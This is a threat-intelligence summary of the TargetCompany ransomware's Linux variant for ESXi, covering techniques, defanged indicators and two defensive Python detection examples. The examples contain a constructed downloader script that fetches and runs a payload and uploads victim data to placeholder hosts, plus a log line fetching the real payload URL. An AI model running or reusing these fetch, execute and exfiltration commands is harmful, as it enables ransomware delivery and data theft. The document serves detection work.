Trend Micro details TargetCompany’s Linux variant that targets VMware ESXi environments with a new payload delivery and execution method built on a custom shell script, plus exfiltration of victim data to two servers. The Linux variant checks for ESXi, encrypts VM-related files, and points to a broader campaign against large IT estates through an ESXi-focused strategy. #TargetCompany #WaterGatpanapun #Mallox #Vampire #ESXi
Keypoints
- The TargetCompany ransomware group has released a new Linux variant that uses a custom shell script for payload delivery and execution, a technique not seen in earlier variants.
- The shell script exfiltrates the victim’s information to two different servers to provide backups for the attackers.
- The Linux variant detects whether the victim machine is running in a VMware ESXi environment and, if so, switches to a VM-focused mode that encrypts VM-related files.
- By targeting ESXi servers, the attackers aim to disrupt operations and improve ransom payout chances.
- An affiliate named “vampire” is associated with this sample, suggesting broader campaigns targeting large IT infrastructures; infrastructure details include a new IP address and short-lived TLS certificate.
- The campaign demonstrates the ongoing evolution of TargetCompany techniques, including the custom shell-script delivery method and exfiltration to two servers for resilience.
MITRE Techniques
- [T1070.004] File Deletion – Used to remove payload artifacts after execution. Quote: “After the ransomware performs its routine, the script deletes the TargetCompany payload using the command “rm -f x”.”
- [T1082] System Information Discovery – Used to detect ESXi by checking system information. Quote: “The binary performs a check by executing the command “uname” to determine whether the machine is running in a VMware ESXi environment.”
- [T1059.004] Command and Scripting Interpreter: Unix Shell – Execution via a custom shell script to download and run the payload. Quote: “Upon further investigations, we found out that a shell script was used to download and execute the ransomware payload hosted in a designated URL. Figure 9 shows the custom-made shell script by the threat actors specifically to execute this TargetCompany variant.”
- [T1105] Ingress Tool Transfer – The script downloads the ransomware payload from a download URL. Quote: “The script attempts to download the TargetCompany payload from the download URL using “wget” or “curl,” whichever works between the two commands.”
- [T1048] Exfiltration Over Alternative Protocol – Exfiltration of victim data to two different servers. Quote: “This variant exfiltrates victim information to two different servers.”
- [T1041] Exfiltration over C2 Channel – Data exfiltration to a C2 server with a specified file name. Quote: “The contents of TargetInfo.txt will be sent to a command-and-control (C&C) server, hxxp://91[BLOCKED], with the file name ap.php.”
- [T1486] Data Encrypted for Impact – Encrypting ESXi VM-related files after entering VM mode. Quote: “Encrypting critical ESXi servers could also increase the likelihood of successful ransom payments.”
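The delivery chain described in the techniques above (fetch the payload with wget or curl, whichever works; execute it; upload victim information to two servers; remove the payload with rm -f) can be triaged statically before anyone runs the script. The following is an added example, not code from the report or from Trend Micro: the sample script is constructed to mirror the described behaviour, and its hosts are RFC 2606 placeholders rather than the real infrastructure.

```python
"""Static triage of a downloader shell script for the behaviour chain the
report attributes to the TargetCompany Linux variant: fetch a payload with
wget or curl (whichever works), run it, post victim information to more
than one server, then delete the payload. Added example; the sample script
below is constructed to mirror that description and is not the actors'
script, and the hosts are RFC 2606 placeholders."""
import re
from urllib.parse import urlparse

# Constructed stand-in for the x.sh described above (not the real script).
SAMPLE_SCRIPT = r"""#!/bin/sh
cd /tmp
wget -q http://dl.example.invalid:8168/general/vmeet/upload/temp/x -O x || curl -s -o x http://dl.example.invalid:8168/general/vmeet/upload/temp/x
chmod +x x
./x
curl -s -F "file=@TargetInfo.txt" http://c2a.example.invalid/ap.php
curl -s -F "file=@TargetInfo.txt" http://c2b.example.invalid/ap.php
rm -f x
"""

URL = re.compile(r"https?://\S+")
# curl options that send data rather than fetch it
UPLOAD_FLAG = re.compile(r"(?:^|\s)(?:-F|-d|--data\S*|-T|--upload-file)(?:\s|$)")
# explicit local output name for wget (-O) or curl (-o)
OUT_FLAG = re.compile(r"(?:^|\s)(?:-O|-o|--output-document|--output)\s+(\S+)")
FETCHERS = ("wget", "curl")


def parse_script(script: str) -> dict:
    """Walk the script line by line and record the behaviours of interest.
    Returns plain data so a caller can assert on it or feed it to a SIEM."""
    info = {
        "downloads": [],     # (tool, url, local file name)
        "fallback": False,   # two fetchers chained with '||' on one line
        "executed": [],      # files run from the script
        "exfil_hosts": [],   # distinct hosts that receive an upload
        "deleted": [],       # files removed with rm
    }
    for raw in script.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        # split on shell list operators so 'a || b' yields two commands
        cmds = [c.strip() for c in re.split(r"\|\||&&|;", line) if c.strip()]
        if "||" in line and sum(c.split()[0] in FETCHERS for c in cmds) >= 2:
            info["fallback"] = True
        for cmd in cmds:
            argv = cmd.split()
            tool, url = argv[0], URL.search(cmd)
            if tool == "curl" and url and UPLOAD_FLAG.search(cmd):
                host = urlparse(url.group(0)).hostname
                if host and host not in info["exfil_hosts"]:
                    info["exfil_hosts"].append(host)
            elif tool in FETCHERS and url:
                out = OUT_FLAG.search(cmd)
                local = out.group(1) if out else url.group(0).rsplit("/", 1)[-1]
                info["downloads"].append((tool, url.group(0), local))
            elif tool.startswith("./"):
                info["executed"].append(tool[2:])
            elif tool in ("sh", "bash") and len(argv) > 1:
                info["executed"].append(argv[1])
            elif tool == "rm":
                info["deleted"].extend(a for a in argv[1:] if not a.startswith("-"))
    return info


def map_to_attack(info: dict) -> dict[str, str]:
    """Translate the parsed behaviours into the technique IDs used above."""
    hits = {}
    if info["downloads"]:
        note = "payload fetched from a remote URL"
        if info["fallback"]:
            note += " with wget/curl fallback via '||'"
        hits["T1105"] = note
    if info["executed"]:
        hits["T1059.004"] = "executed from the shell: " + ", ".join(info["executed"])
    if info["exfil_hosts"]:
        n = len(info["exfil_hosts"])
        hits["T1041"] = f"upload to {n} distinct host(s): " + ", ".join(info["exfil_hosts"])
    # the deleted file is the downloaded payload: cleanup, not housekeeping
    payloads = {name for _, _, name in info["downloads"]}
    removed = sorted(payloads & {d.rsplit("/", 1)[-1] for d in info["deleted"]})
    if removed:
        hits["T1070.004"] = "downloaded payload deleted after execution: " + ", ".join(removed)
    return hits


if __name__ == "__main__":
    for tid, why in map_to_attack(parse_script(SAMPLE_SCRIPT)).items():
        print(tid, "-", why)
```

The correlation in map_to_attack is the point: a bare rm -f is noise on most hosts, but rm of the same file name that wget or curl just wrote, on a box that also posts TargetInfo.txt to two hosts, is the full chain the report describes and is worth an alert on its own.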
Indicators of Compromise
- [Hash] TargetCompany Linux Variant (SHA-1) – dffa99b9fe6e7d3e19afba38c9f7ec739581f656, 2b82b463dab61cd3d7765492d7b4a529b4618e57
- [URL] Download URLs – hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x.sh, hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x
- [IP] Delivery/Exfiltration IP – 111.10.231[.]151
- [File name] Exfiltration artifacts – TargetInfo.txt (collected victim information), ap.php (file name used when the data is posted to the C&C server)
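To turn the indicators above into a hunt, the following added example (not from the report or from Trend Micro) matches them against constructed log lines written in the style of ESXi's shell.log plus one made-up proxy record. The indicators stay defanged at rest and are refanged only in memory for matching; the C&C host in the sample proxy line is a TEST-NET placeholder because the report blocks the real one.

```python
"""Hunt for the indicators listed above in ESXi shell history and proxy
logs. Added example: the log lines are constructed (the ESXi lines follow
the shell.log style, the proxy line is made up), and the indicators are
stored defanged and only refanged in memory for matching."""
import hashlib
import re

# Indicators from the list above, kept defanged at rest.
IOCS = {
    "sha1": {
        "dffa99b9fe6e7d3e19afba38c9f7ec739581f656",
        "2b82b463dab61cd3d7765492d7b4a529b4618e57",
    },
    "url": {
        "hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x.sh",
        "hxxp://111.10.231[.]151:8168/general/vmeet/upload/temp/x",
    },
    "ip": {"111.10.231[.]151"},
    "filename": {"TargetInfo.txt", "ap.php"},
}

# Constructed log excerpt; the C&C address is a TEST-NET placeholder.
SAMPLE_LOGS = """\
2024-06-05T10:12:01Z esxi01 shell[2099737]: [root]: cd /tmp
2024-06-05T10:12:04Z esxi01 shell[2099737]: [root]: wget -q http://111.10.231.151:8168/general/vmeet/upload/temp/x.sh
2024-06-05T10:12:09Z esxi01 shell[2099737]: [root]: sh x.sh
2024-06-05T10:12:31Z proxy01 squid: 10.0.0.5 POST http://198.51.100.7/ap.php TargetInfo.txt
2024-06-05T10:13:02Z esxi01 shell[2099737]: [root]: rm -f x
2024-06-05T10:14:00Z esxi02 shell[2100001]: [root]: esxcli vm process list
"""


def refang(ioc: str) -> str:
    """Restore the literal on-the-wire form of a defanged indicator."""
    return ioc.replace("hxxp", "http").replace("[.]", ".").replace("[:]", ":")


def build_matchers() -> list[tuple[str, str, re.Pattern]]:
    """One anchored regex per indicator. Boundaries on both sides mean
    '.../temp/x' does not also fire on '.../temp/x.sh' and the bare IP
    does not fire inside a longer dotted string."""
    matchers = []
    for kind in ("url", "ip", "filename"):
        for ioc in sorted(IOCS[kind]):
            lit = re.escape(refang(ioc))
            matchers.append((kind, ioc, re.compile(r"(?<![\w.])" + lit + r"(?![\w.])")))
    return matchers


def hunt(log_text: str) -> list[tuple[int, str, str]]:
    """Return (line number, indicator kind, defanged indicator) per hit."""
    matchers = build_matchers()
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        for kind, ioc, rx in matchers:
            if rx.search(line):
                hits.append((n, kind, ioc))
    return hits


def sha1_is_known(data: bytes) -> bool:
    """Check recovered file bytes (e.g. a /tmp/x left behind) against the list."""
    return hashlib.sha1(data).hexdigest() in IOCS["sha1"]


if __name__ == "__main__":
    for n, kind, ioc in hunt(SAMPLE_LOGS):
        print(f"line {n}: {kind} {ioc}")
```

Note what the sample does not catch: the `sh x.sh` and `rm -f x` lines carry no listed indicator, so an IoC-only hunt sees the download and the upload but not the execution in between. Pair it with behavioural detection on the shell history (a fetcher followed by execution and deletion of the same file name) rather than relying on indicators alone, since the IP and URL are the easiest things for the operators to rotate.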